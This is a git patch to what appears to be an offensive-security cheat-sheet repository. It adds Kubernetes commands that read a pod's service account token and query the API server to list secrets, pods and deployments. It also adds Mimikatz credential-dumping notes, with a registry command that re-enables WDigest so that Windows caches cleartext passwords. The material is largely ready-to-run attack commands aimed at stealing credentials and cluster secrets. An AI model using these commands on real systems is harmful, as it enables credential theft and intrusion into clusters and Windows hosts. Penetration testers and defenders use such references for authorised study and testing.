From 1535c5f1b31617fb2e06bc33163f38a51883c581 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 20 Dec 2019 11:33:25 +0100 Subject: [PATCH] Kubernetes - Privileged Service Account Token --- Kubernetes/readme.md | 25 +++++++++++++++++++ .../Windows - Mimikatz.md | 15 +++++++++++ XSLT Injection/README.md | 1 + 3 files changed, 41 insertions(+) diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index 8dd3470..d409dc0 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -12,6 +12,8 @@ - [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec) - [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings) - [Impersonating a Privileged Account](#impersonating-a-privileged-account) +- [Privileged Service Account Token](#privileged-service-account-token) +- [Interesting endpoints to reach](#interesting-endpoints-to-reach) - [API addresses that you should know](#api-adresses-that-you-should-know) - [References](#references) @@ -111,6 +113,29 @@ curl -k -v -X POST -H "Authorization: Bearer " -H "Conten curl -k -v -XGET -H "Authorization: Bearer " -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://:/api/v1/namespaces/kube-system/secrets/ ``` +## Privileged Service Account Token + +```powershell +$ cat /run/secrets/kubernetes.io/serviceaccount/token +$ curl -k -v -H "Authorization: Bearer " https://:/api/v1/namespaces/default/secrets/ +``` + +## Interesting endpoints to reach + +```powershell +# List Pods +curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/default/pods/ + +# List secrets +curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/default/secrets/ + +# List deployments +curl -v -H "Authorization: Bearer " https:///apis/extensions/v1beta1/namespaces/default/deployments + +# List daemonsets +curl -v -H "Authorization: Bearer " https:///apis/extensions/v1beta1/namespaces/default/daemonsets +``` + ## API addresses that you should know diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 6a40954..ec25124 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -21,6 +21,8 @@ mimikatz # sekurlsa::wdigest ## Mimikatz - Extract passwords +> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled. + ```powershell mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::wdigest @@ -28,8 +30,21 @@ mimikatz_command -f sekurlsa::wdigest # to re-enable wdigest in Windows Server 2012+ # in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest # create a DWORD 'UseLogonCredential' with the value 1. +reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1 ``` +:warning: To take effect, conditions are required : +- Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2: + * Adding requires lock + * Removing requires signout +- Win10: + * Adding requires signout + * Removing requires signout +- Win2016: + * Adding requires lock + * Removing requires reboot + + ## Mimikatz - Mini Dump Dump the lsass process. diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md index 3b28790..2a9a22e 100644 --- a/XSLT Injection/README.md +++ b/XSLT Injection/README.md @@ -13,6 +13,7 @@ - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper) - [Remote Code Execution with Java](#remote-code-execution-with-java) - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net) +- [References](#references) ## Tools